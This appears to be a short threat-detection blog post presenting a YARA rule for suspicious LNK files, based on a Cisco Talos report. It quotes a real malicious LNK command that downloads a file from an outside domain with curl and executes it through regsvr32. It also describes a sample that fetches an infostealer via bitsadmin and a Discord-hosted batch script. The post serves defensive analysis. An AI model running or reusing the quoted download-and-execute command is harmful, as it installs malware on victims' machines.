The inspiration for todays yara rule comes from Cisco Talos's newest blog post: Following the LNK metadata trail. I started by reviewing over the LNK files included in their IOCs
I noticed a few of the LNK files mentioned use && quite a bit:
/q /c echo 'SGz' && echo "TYEq" && MD "%HOMEPATH%\bG" && echo "Nm" && ping ExCt.com && echo "rcF" && curl.exe -o %HOMEPATH%\bG\J10M.VI.WYYK https://takeone[.]tech/8NMlHT/EWw.png && regsvr32 "%HOMEPATH%\bG\J10M.VI.WYYK"
Here's the Yara rule that I created for detecting suspicious LNK files:
rule sus_lnk_files {
meta:
author = "Colin Cowie"
description = "Yara rule to detect suspicious .LNK files"
reference = "/~https://github.com/Cisco-Talos/IOCs/blob/main/2023/01/following-the-lnk-metadata-trail.txt"
strings:
$lnk_header = { 4C 00 00 00 }
$andand = " && " ascii wide
condition:
$lnk_header at 0
and #andand > 2
and filesize < 5KB
}
At first I did not include ascii wide in the yara rule for the string $andand = " && ". After making that change I got great results instead of none!
Here's one intresting finding:
- Filename:
output.lnk - SHA1:
24fec293033b5c7103b1c1031394043943497459 - VT Upload date: 2023-01-07 13:27:41 UTC
Functionality:
- uses
bitsadmin /transferto download .bat script from discord CDN - .bat script downloads
payload.exe(InfoStealer)
Payload: